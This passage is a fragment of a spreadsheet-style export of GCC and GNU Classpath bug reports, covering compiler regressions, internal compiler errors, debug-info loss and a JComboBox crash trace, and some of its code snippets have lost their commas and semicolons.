 &gt; execute/ieee/fp-cmp-5.c:19: RTL check: expected elt 0 type 'e' or 'u' have '*' (rtx UnKnown) in gen_rtx_fmt_ee at genrtl.c:46
Release:
gcc version 3.1 20020328 (prerelease)
Environment:
sparc-sun-solaris2.7 native as/ld
How-To-Repeat:
configure with --enable-checking=misctreertlgc on solaris2.7 bootstrap and run make check</t>
  </si>
  <si>
    <t>GCC-29215</t>
  </si>
  <si>
    <t>[4.3 Regression] extra store for memcpy</t>
  </si>
  <si>
    <t>The attached file and the output of gcc -O2 -S illustrate the problem.
The inlining of logarg seems to have resulted in a second buffer which is only ever written to.</t>
  </si>
  <si>
    <t>GCC-35860</t>
  </si>
  <si>
    <t>[4.4/4.5/4.6/4.7 Regression] [avr] code bloat caused by -fsplit-wide-types</t>
  </si>
  <si>
    <t>Command:
  avr-gcc -O1 -S div32_7.c
or
  avr-gcc -O1 -fno-split-wide-types -S div32_7.c
Code size 4.1.2: 0x28
Code size 4.3.0: 0x68
Code size 4.3.0: 0x28 with -fno-split-wide-types
//----------------
unsigned long udivr32_7( unsigned long a unsigned char b unsigned char *r )
{
  unsigned char i t
  for(  t = 0 i = 32 i  i-- ){
    t += t
    if( a &amp; 0x80000000UL )
      t++
    a += a
    if( t &gt;= b ){
      t -= b
      a |= 1
    }
  }
  *r = t
  return a
}
//----------------</t>
  </si>
  <si>
    <t>a.kaiser</t>
  </si>
  <si>
    <t>GCC-9535</t>
  </si>
  <si>
    <t>Datagram socket semantics are wrong</t>
  </si>
  <si>
    <t>Datagram sockets try to behave like streams -- they will send as many datagrams as necessary to output the data rather than failing if the user sends more than the max datagram size and read as many as necessary to fill the user buffer.
I believe they should respect the datagram-ness of the medium the user has chosen. There are all sorts of problems with the present model (out-of-order arrival etc).
I propose the attached patch.
Release:
gcc version 3.4 20030201 (experimental)
Environment:
i686-pc-linux-gnu
How-To-Repeat:
Not applicable.</t>
  </si>
  <si>
    <t>GCC-83728</t>
  </si>
  <si>
    <t>[8 regression] FAIL: gcc.dg/guality/pr68037-1.c</t>
  </si>
  <si>
    <t>On x86 r255569 caused:
FAIL: gcc.dg/guality/pr68037-1.c   -O2  line 33 error == 0x12345670
FAIL: gcc.dg/guality/pr68037-1.c   -O2  line 33 frame-&gt;ip == 0x12345671
FAIL: gcc.dg/guality/pr68037-1.c   -O2  line 33 frame-&gt;cs == 0x12345672
FAIL: gcc.dg/guality/pr68037-1.c   -O2  line 33 frame-&gt;flags == 0x12345673
FAIL: gcc.dg/guality/pr68037-1.c   -O2  line 33 frame-&gt;sp == 0x12345674
FAIL: gcc.dg/guality/pr68037-1.c   -O2  line 33 frame-&gt;ss == 0x12345675
FAIL: gcc.dg/guality/pr68037-1.c   -O3 -g  line 33 error == 0x12345670
FAIL: gcc.dg/guality/pr68037-1.c   -O3 -g  line 33 frame-&gt;ip == 0x12345671
FAIL: gcc.dg/guality/pr68037-1.c   -O3 -g  line 33 frame-&gt;cs == 0x12345672
FAIL: gcc.dg/guality/pr68037-1.c   -O3 -g  line 33 frame-&gt;flags == 0x12345673
FAIL: gcc.dg/guality/pr68037-1.c   -O3 -g  line 33 frame-&gt;sp == 0x12345674
FAIL: gcc.dg/guality/pr68037-1.c   -O3 -g  line 33 frame-&gt;ss == 0x12345675
FAIL: gcc.dg/guality/pr68037-1.c   -Os  line 33 error == 0x12345670
FAIL: gcc.dg/guality/pr68037-1.c   -Os  line 33 frame-&gt;ip == 0x12345671
FAIL: gcc.dg/guality/pr68037-1.c   -Os  line 33 frame-&gt;cs == 0x12345672
FAIL: gcc.dg/guality/pr68037-1.c   -Os  line 33 frame-&gt;flags == 0x12345673
FAIL: gcc.dg/guality/pr68037-1.c   -Os  line 33 frame-&gt;sp == 0x12345674
FAIL: gcc.dg/guality/pr68037-1.c   -Os  line 33 frame-&gt;ss == 0x12345675</t>
  </si>
  <si>
    <t>GCC-20611</t>
  </si>
  <si>
    <t>duplicate label for inlined function referencing TLS</t>
  </si>
  <si>
    <t>PAPI fails to build on powerpc-linux with -O3 -fPIC due to multiple
symbols of the same name in assembler output.  The minimized test case
demonstrates the problem.
The failure occurs on the 3.4 branch (the FSF version in which TLS is
first supported for powerpc-linux) and on the hammer-3.3 and 3.4-rhl
branches but not on mainline or the 4.0 branch.  There is not a
problem with 64-bit compilation.
I'll run a regression hunt to determine when the fix was added and
hope that it's something smaller than the tree-ssa merge.</t>
  </si>
  <si>
    <t>GCC-42672</t>
  </si>
  <si>
    <t>missing symbols in libgomp when linked with gold</t>
  </si>
  <si>
    <t>seen with 20100107 ix86 using gold from the 2.20 branch:
- omp_destroy_lock@OMP_3.0 4.4
- omp_destroy_lock_@OMP_3.0 4.4
- omp_destroy_nest_lock@OMP_3.0 4.4
- omp_destroy_nest_lock_@OMP_3.0 4.4
- omp_init_lock@OMP_3.0 4.4
- omp_init_lock_@OMP_3.0 4.4
- omp_init_nest_lock@OMP_3.0 4.4
- omp_init_nest_lock_@OMP_3.0 4.4
- omp_set_lock@OMP_3.0 4.4
- omp_set_lock_@OMP_3.0 4.4
- omp_set_nest_lock@OMP_3.0 4.4
- omp_set_nest_lock_@OMP_3.0 4.4
- omp_test_lock@OMP_3.0 4.4
- omp_test_lock_@OMP_3.0 4.4
- omp_test_nest_lock@OMP_3.0 4.4
- omp_test_nest_lock_@OMP_3.0 4.4
- omp_unset_lock@OMP_3.0 4.4
- omp_unset_lock_@OMP_3.0 4.4
- omp_unset_nest_lock@OMP_3.0 4.4
- omp_unset_nest_lock_@OMP_3.0 4.4</t>
  </si>
  <si>
    <t>GCC-23763</t>
  </si>
  <si>
    <t>Runtime.getRuntime().exec() signalling</t>
  </si>
  <si>
    <t>Showcase: compile exectest.c run test.java calling 'exectest'
Runtime.exec() seems to pass down some strange signal configuration to child
processes in GCC &gt;=4.0.0. When run from test.java the exectest.c parent process
does never get CHLD signals - they seem to get blocked (as I've seen the
rtsig-queue growing each time test.java was run).
GCC 3.3.3 does not have this problem.</t>
  </si>
  <si>
    <t>GCC-43077</t>
  </si>
  <si>
    <t>VTA issues caused by SSA expand</t>
  </si>
  <si>
    <t>In the following testcase in both foo and baz functions var[abc] debuginfo
is lost during SSA expansion (unlike e.g. with redhat/gcc-4_4-branch VTA which doesn't do SSA expansion):
int varb
int __attribute__((noinline))
foo (void)
{
  int vara = (varb == 3)
  asm volatile ( : : g (vara))
  return 0
}
int __attribute__((noinline))
bar (unsigned long *p unsigned long *q)
{
  int ret
  asm volatile ( : =r (ret) =r (*p) =r (*q) : 0 (1) 1 (2) 2 (3))
  return ret
}
int __attribute__((noinline))
baz (void)
{
  unsigned long a = 0 b = 0 c = 0
  a = bar (
  unsigned long vara = a
  unsigned long varb = b
  unsigned long varc = c
  __asm__ volatile ( : : g (vara) g (varb) g (varc))
  return a
}
int
main (void)
{
  foo ()
  baz ()
  return 0
}
In *.optimized we have on redhat/gcc-4_4-branch:
foo
  # DEBUG vara =&gt; varb == 3
  __asm__ __volatile__( :  : g varb == 3)
baz:
  D.1615D.1615 = bar (
  # DEBUG D#1 =&gt; (long unsigned int) D.1615D.1615
  # DEBUG a =&gt; D#1
  # DEBUG vara =&gt; D#1
  # DEBUG D#2 =&gt; b
  # DEBUG varb =&gt; D#2
  # DEBUG D#3 =&gt; c
  # DEBUG varc =&gt; D#3
  __asm__ __volatile__( :  : g (long unsigned int) D.1615D.1615 g b g c)
and on the trunk:
foo:
  varb.0_1 = varb
  vara_2 = varb.0_1 == 3
  # DEBUG vara =&gt; vara_2
  __asm__ __volatile__( :  : g vara_2)
baz:
  D.2742_2 = bar (
  a_3 = (long unsigned int) D.2742_2
  # DEBUG a =&gt; a_3
  # DEBUG vara =&gt; a_3
  varb_5 = b
  # DEBUG varb =&gt; varb_5
  varc_6 = c
  # DEBUG varc =&gt; varc_6
  __asm__ __volatile__( :  : g a_3 g varb_5 g varc_6)
On redhat/gcc-4_4-branch then expansion has debug insns which still track where the variables really live:
foo:
(debug_insn 5 4 6 3 P.c:6 (var_location:SI vara (eq:SI (mem/c/i:SI (symbol_ref:DI (varb)  ) [2 varb+0 S4 A32]) (const_int 3 [0x3]))) -1 (nil))
baz:
(debug_insn 14 13 15 3 P.c:23 (var_location:DI D.4294967295 (zero_extend:DI (reg:SI 58 [ D.1615 ]))) -1 (nil))
(debug_insn 15 14 16 3 P.c:23 (var_location:DI a (debug_expr:DI D#1)) -1 (nil))
(debug_insn 16 15 17 3 P.c:24 (var_location:DI vara (debug_expr:DI D#1)) -1 (nil))
(debug_insn 17 16 18 3 P.c:25 (var_location:DI D.4294967294 (mem/c/i:DI (plus:DI (reg/f:DI 54 virtual-stack-vars) (const_int -8 [0xfffffffffffffff8])) [3 b+0 S8 A64])) -1 (nil))
(debug_insn 18 17 19 3 P.c:25 (var_location:DI varb (debug_expr:DI D#2)) -1 (nil))
(debug_insn 19 18 20 3 P.c:26 (var_location:DI D.4294967293 (mem/c/i:DI (plus:DI (reg/f:DI 54 virtual-stack-vars) (const_int -16 [0xfffffffffffffff0])) [3 c+0 S8 A64])) -1 (nil))
(debug_insn 20 19 21 3 P.c:26 (var_location:DI varc (debug_expr:DI D#3)) -1 (nil))
but on the trunk in *.expand we have:
foo:
(debug_insn 5 4 6 3 P.c:6 (var_location:SI vara (reg/v:SI 59 [ vara ])) -1 (nil))
(insn 6 5 7 3 P.c:7 (set (reg:CCZ 17 flags) (compare:CCZ (mem/c/i:SI (symbol_ref:DI (varb)  ) [2 varb+0 S4 A32]) (const_int 3 [0x3]))) -1 (nil))
(insn 7 6 8 3 P.c:7 (set (reg:QI 62) (eq:QI (reg:CCZ 17 flags) (const_int 0 [0x0]))) -1 (nil))
(insn 8 7 9 3 P.c:7 (parallel [(set (reg:SI 61) (zero_extend:SI (reg:QI 62))) (clobber (reg:CC 17 flags))]) -1 (nil))
(insn 9 8 10 3 P.c:7 (parallel [(asm_operands/v () () 0 [(reg:SI 61)]...
baz:
(debug_insn 14 13 15 3 P.c:23 (var_location:DI a (reg/v:DI 59 [ a ])) -1 (nil))
(debug_insn 15 14 16 3 P.c:24 (var_location:DI vara (reg/v:DI 59 [ a ])) -1 (nil))
(debug_insn 16 15 17 3 P.c:25 (var_location:DI varb (reg/v:DI 60 [ varb ])) -1 (nil))
(debug_insn 17 16 18 3 P.c:26 (var_location:DI varc (reg/v:DI 61 [ varc ])) -1 (nil))
(insn 18 17 19 3 P.c:27 (set (reg:DI 65) (sign_extend:DI (reg:SI 58 [ D.2742 ]))) -1 (nil))
(insn 19 18 20 3 P.c:27 (parallel [(asm_operands/v () () 0 [(reg:DI 65) (mem/c/i:DI (plus:DI (reg/f:DI 54 virtual-stack-vars) (const_int -8 [0xfffffffffffffff8])) [3 b+0 S8 A64]) (mem/c/i:DI (plus:DI (reg/f:DI 54 virtual-stack-vars) (const_int -16 [0xfffffffffffffff0])) [3 c+0 S8 A128])]...
The problem is that pseudo 59 in foo resp. pseudos in 59/60/61 in baz are only referenced in the debug_insns never initialized or used in actual code and therefore are pretty soon just changed into (clobber (const_int 0)).  I believe
this is because SSA expansion in some cases (e.g. for the asm operand g) does a TER so DECL_RTL of the SSA_NAME isn't actually used.  I guess we'd need to TER in this case also into the DEBUG_INSN locations but not sure when exactly to do that.
This is quite important e.g. for SystemTap as asm g input operands with some short lived vars in a macro is something that is used in user probes and SystemTap then expects to find the values of those vars in the debuginfo.</t>
  </si>
  <si>
    <t>CLASSPATH-26645</t>
  </si>
  <si>
    <t>Editable JComboBox crashes</t>
  </si>
  <si>
    <t>The following program creates an editable JComboBox with no items:
import javax.swing.*
public class ComboBoxBug
{
    public static void main(String[] arg)
    {
        JFrame frame = new JFrame()
        JComboBox comboBox = new JComboBox()
        comboBox.setEditable(true)
        frame.getContentPane().add(comboBox)
        frame.pack()
        frame.setVisible(true)
    }
}
It causes a NullPointerException:
Exception during event dispatch:
java.lang.NullPointerException
   at javax.swing.plaf.basic.BasicComboBoxEditor.setItem(java.lang.Object) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.plaf.basic.BasicComboBoxUI.paintCurrentValue(java.awt.Graphics java.awt.Rectangle boolean) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.plaf.basic.BasicComboBoxUI.paint(java.awt.Graphics javax.swing.JComponent) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.plaf.ComponentUI.update(java.awt.Graphics javax.swing.JComponent) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintComponent(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container$GfxPaintVisitor.visit(java.awt.Component java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChild(java.awt.Graphics java.awt.Container$GfxVisitor java.awt.Component) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChildren(java.awt.Graphics java.awt.Container$GfxVisitor boolean) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintChildren(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container$GfxPaintVisitor.visit(java.awt.Component java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChild(java.awt.Graphics java.awt.Container$GfxVisitor java.awt.Component) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChildren(java.awt.Graphics java.awt.Container$GfxVisitor boolean) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintChildren(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container$GfxPaintVisitor.visit(java.awt.Component java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChild(java.awt.Graphics java.awt.Container$GfxVisitor java.awt.Component) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChildren(java.awt.Graphics java.awt.Container$GfxVisitor boolean) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintChildren(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container$GfxPaintVisitor.visit(java.awt.Component java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChild(java.awt.Graphics java.awt.Container$GfxVisitor java.awt.Component) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChildren(java.awt.Graphics java.awt.Container$GfxVisitor boolean) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintImmediately(java.awt.Rectangle) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.RepaintManager.paintDirtyRegions() (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.RepaintManager$RepaintWorker.run() (/usr/lib/libgcj.so.6.0.0)
   at java.awt.event.InvocationEvent.dispatch() (/usr/lib/libgcj.so.6.0.0)
   at java.awt.EventQueue.dispatchEvent(java.awt.AWTEvent) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.EventDispatchThread.run() (/usr/lib/libgcj.so.6.0.0)
   at .GC_start_routine (/usr/lib/libgcj.so.6.0.0)
   at .__clone (/lib/libc-2.3.5.so)
Exception during event dispatch:
java.lang.NullPointerException
   at javax.swing.plaf.basic.BasicComboBoxEditor.setItem(java.lang.Object) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.plaf.basic.BasicComboBoxUI.paintCurrentValue(java.awt.Graphics java.awt.Rectangle boolean) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.plaf.basic.BasicComboBoxUI.paint(java.awt.Graphics javax.swing.JComponent) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.plaf.ComponentUI.update(java.awt.Graphics javax.swing.JComponent) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintComponent(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container$GfxPaintVisitor.visit(java.awt.Component java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChild(java.awt.Graphics java.awt.Container$GfxVisitor java.awt.Component) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChildren(java.awt.Graphics java.awt.Container$GfxVisitor boolean) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintChildren(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container$GfxPaintVisitor.visit(java.awt.Component java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChild(java.awt.Graphics java.awt.Container$GfxVisitor java.awt.Component) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChildren(java.awt.Graphics java.awt.Container$GfxVisitor boolean) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintChildren(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container$GfxPaintVisitor.visit(java.awt.Component java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChild(java.awt.Graphics java.awt.Container$GfxVisitor java.awt.Component) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChildren(java.awt.Graphics java.awt.Container$GfxVisitor boolean) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintChildren(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container$GfxPaintVisitor.visit(java.awt.Component java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChild(java.awt.Graphics java.awt.Container$GfxVisitor java.awt.Component) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChildren(java.awt.Graphics java.awt.Container$GfxVisitor boolean) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at gnu.java.awt.peer.gtk.GtkComponentPeer.handleEvent(java.awt.AWTEvent) (/usr/lib/lib-gnu-java-awt-peer-gtk.so.6.0.0)
   at java.awt.Component.dispatchEvent(java.awt.AWTEvent) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.EventQueue.dispatchEvent(java.awt.AWTEvent) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.EventDispatchThread.run() (/usr/lib/libgcj.so.6.0.0)
   at .GC_start_routine (/usr/lib/libgcj.so.6.0.0)
   at .__clone (/lib/libc-2.3.5.so)
Exception during event dispatch:
java.lang.NullPointerException
   at javax.swing.plaf.basic.BasicComboBoxEditor.setItem(java.lang.Object) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.plaf.basic.BasicComboBoxUI.paintCurrentValue(java.awt.Graphics java.awt.Rectangle boolean) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.plaf.basic.BasicComboBoxUI.paint(java.awt.Graphics javax.swing.JComponent) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.plaf.ComponentUI.update(java.awt.Graphics javax.swing.JComponent) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintComponent(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container$GfxPaintVisitor.visit(java.awt.Component java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChild(java.awt.Graphics java.awt.Container$GfxVisitor java.awt.Component) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChildren(java.awt.Graphics java.awt.Container$GfxVisitor boolean) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintChildren(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container$GfxPaintVisitor.visit(java.awt.Component java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChild(java.awt.Graphics java.awt.Container$GfxVisitor java.awt.Component) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChildren(java.awt.Graphics java.awt.Container$GfxVisitor boolean) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintChildren(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container$GfxPaintVisitor.visit(java.awt.Component java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChild(java.awt.Graphics java.awt.Container$GfxVisitor java.awt.Component) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChildren(java.awt.Graphics java.awt.Container$GfxVisitor boolean) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintChildren(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container$GfxPaintVisitor.visit(java.awt.Component java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChild(java.awt.Graphics java.awt.Container$GfxVisitor java.awt.Component) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.visitChildren(java.awt.Graphics java.awt.Container$GfxVisitor boolean) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.Container.paint(java.awt.Graphics) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.JComponent.paintImmediately(java.awt.Rectangle) (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.RepaintManager.paintDirtyRegions() (/usr/lib/libgcj.so.6.0.0)
   at javax.swing.RepaintManager$RepaintWorker.run() (/usr/lib/libgcj.so.6.0.0)
   at java.awt.event.InvocationEvent.dispatch() (/usr/lib/libgcj.so.6.0.0)
   at java.awt.EventQueue.dispatchEvent(java.awt.AWTEvent) (/usr/lib/libgcj.so.6.0.0)
   at java.awt.EventDispatchThread.run() (/usr/lib/libgcj.so.6.0.0)
   at .GC_start_routine (/usr/lib/libgcj.so.6.0.0)
   at .__clone (/lib/libc-2.3.5.so)</t>
  </si>
  <si>
    <t>GCC-10222</t>
  </si>
  <si>
    <t>[3.2 regression] [Sparc] Wrong code with -mcpu=ultrasparc using gcc 3.2.2</t>
  </si>
  <si>
    <t>The attached file contains a very small and simple function extracted from a big application. The code produced by -03 is  correct. The code produced using -03 -mcpu=ultrasparc is
wrong and causes the application to go into an infinite loop.
From what I can see the problem is partly caused by the fact that the code lies about types when it appends elements to the free list. My guess is that -mcpu=ultrasparc triggers a scheduling pass which assumes one store cannot affect another load since they are of different types. I can pass -fno-strict-aliasing to gcc to work around that but arguably this is unsatisfactory for various reasons:
 1. What I naively expect from -mcpu=ultrasparc is to      
    perform target specific code generation not to affect
    the alias analysis which is used.
 2. This behaviour is not something that happened with
    previous versions of gcc (e.g. 2.95.x) and gcc 3.2
    on x86 with -mcpu=pentiumpro does not exhibit such
    behaviour.
Release:
version 3.2.2
Environment:
Solaris 9 (probably on all Solaris versions)
How-To-Repeat:
Compile using:
gcc -c -O3 -S file.c
gcc -c -O3 -mcpu=ultrasparc -S file.c</t>
  </si>
  <si>
    <t>kostis</t>
  </si>
  <si>
    <t>GCC-16357</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE copying 7 bytes between extern char[]s</t>
  </si>
  <si>
    <t>Compiling the following:
-----------------------------------------------------------
extern char foo[] bar[]
void f (void) { memcpy (foo bar 7) }
-----------------------------------------------------------
with mipsisa64-elf causes an ICE:
-----------------------------------------------------------
/tmp/foo.c: In function `f':
/tmp/foo.c:2: error: PRINT_OPERAND invalid operand for relocation
(const:DI (plus:DI (symbol_ref:DI (bar) [flags 0x40] )
        (const_int 6 [0x6])))
/tmp/foo.c:2: internal compiler error: in print_operand_reloc at
config/mips/mips.c:5624
-----------------------------------------------------------
The problem is due to incorrect mode usage in mips_block_move_straight.
Testing a fix now.</t>
  </si>
  <si>
    <t>GCC-12676</t>
  </si>
  <si>
    <t>m68k.c: LP64 bug</t>
  </si>
  <si>
    <t>Index: m68k.c
The following diff fixes a LP64 bug.
===================================================================
RCS file: /cvs/gcc/gcc/gcc/config/m68k/m68k.cv
retrieving revision 1.111
diff -u -r1.111 m68k.c
--- m68k.c      13 Oct 2003 21:16:28 -0000      1.111
+++ m68k.c      19 Oct 2003 01:15:51 -0000
@@ -24677 +24677 @@
       /* These insns can result from reloads to access
         stack slots over 64k from the frame pointer.  */
       if (GET_CODE (operands[2]) == CONST_INT
-         &amp;&amp; INTVAL (operands[2]) + 0x8000 &gt;= (unsigned) 0x10000)
+         &amp;&amp; INTVAL (operands[2]) + 0x8000 &gt;= (unsigned HOST_WIDE_INT) 0x10000)
         return move%.l %2%0\n\tadd%.l %1%0
 #ifdef SGS
       if (GET_CODE (operands[2]) == REG)</t>
  </si>
  <si>
    <t>GCC-53347</t>
  </si>
  <si>
    <t>Duplicated redundant condition in compare-elim.c</t>
  </si>
  <si>
    <t>There's a duplicated redundant condition in compare-elim.c line 148:
  if (REG_P (XEXP (src 0))
      &amp;&amp; REG_P (XEXP (src 0))
      &amp;&amp; (REG_P (XEXP (src 1)) || CONSTANT_P (XEXP (src 1))))
    return src
This can be simplified:
  if (REG_P (XEXP (src 0))
      &amp;&amp; (REG_P (XEXP (src 1)) || CONSTANT_P (XEXP (src 1))))
    return src
I think care must be taken to ensure that this is indeed duplicated and that the developer didn't intend to write something else instead.</t>
  </si>
  <si>
    <t>paulo</t>
  </si>
  <si>
    <t>GCC-10909</t>
  </si>
  <si>
    <t>GCC-12198</t>
  </si>
  <si>
    <t>[tree-ssa] Miscompilation of case ranges</t>
  </si>
  <si>
    <t>Switch statements containing the Case Ranges extension are miscompiled. The 
following test fails when i != 1.  
int main() 
{ 
   int i 
   i = 2 
   switch (i) 
      { 
      case 1 ... 5: 
         goto L1 
      default: 
         abort () 
         goto L1 
      } 
   L1: 
   exit(0) 
}</t>
  </si>
  <si>
    <t>GCC-42216</t>
  </si>
  <si>
    <t>[4.5 Regression] changes in scheduling regress 464.h264ref 20%</t>
  </si>
  <si>
    <t>See http://gcc.opensuse.org/SPEC/CINT/sb-balakirew-head-64-2006/recent.html
First bad rev. is 154713 last good is 154686.
It's quite obvious that either the regrename.c changes have code generation
differences or that removing the vec_interleave_* expanders caused this
regression.
Richard - you removed all vec_interleave_* expanders but the vectorizer
still checks for optab_for_tree_code (VEC_INTERLEAVE_*_EXPR) which ends
up looking at vec_interleave_*_optab.  Either this code is all dead now
or you caused the vectorization no longer to apply.
I'll check if reverting your revision gets back performance.</t>
  </si>
  <si>
    <t>GCC-45756</t>
  </si>
  <si>
    <t>Multiple DECL for array valued PARAMETER (-fwhole-file issue)</t>
  </si>
  <si>
    <t>Currently gfc_get_symbol_decl only deals with -fwhole-file issues of module variable (FL_VARIABLE( but not with array-valued (or non-intrinsic-type) parameters (FL_PARAMETER).
Thus for the following program multiple UIDs will be generated for the program below:
module m
  integer parameter :: para(3) = [1 2 3]
end module m
subroutine one
  use m
  i = para(1)
end subroutine one
subroutine two
  use m
  j = para(1)
end subroutine two
-fdump-tree-original-uid shows:
  extern integer(kind=4)D.8 paraD.1556[3]
  extern integer(kind=4)D.8 paraD.1561[3]</t>
  </si>
  <si>
    <t>GCC-40600</t>
  </si>
  <si>
    <t>pair&amp; operator=(pair&amp;&amp; __p) doesn't work without inlining</t>
  </si>
  <si>
    <t>25_algorithms/minmax/2.cc fails with -fno-inline because
  std::pair&lt;const int
converts an rvalue to an lvalue:
  std::initializer_list::initializer_list (
  D.15878 = minmax (D.15746)
  std::pair&lt;const int
std::pair::pair(std::pair&amp;&amp;) [with _U1 = int _U2 = int _T1 = const int&amp; _T2 = const int&amp;] (struct pair * const this struct pair &amp; __p)
{
  type D.16339
  type 
  int * D.16337
  type D.16340
  type D.16335
  type 
  int * D.16333
  type D.16336
:
  D.16333_2 = 
  D.16334_3 = move&lt;int
  D.16335_4 = *D.16334_3
  D.16336 = D.16335_4
  this_5(D)-&gt;first = 
  D.16337_6 = 
  D.16338_7 = move&lt;int
  D.16339_8 = *D.16338_7
  D.16340 = D.16339_8
  this_5(D)-&gt;second = 
  return
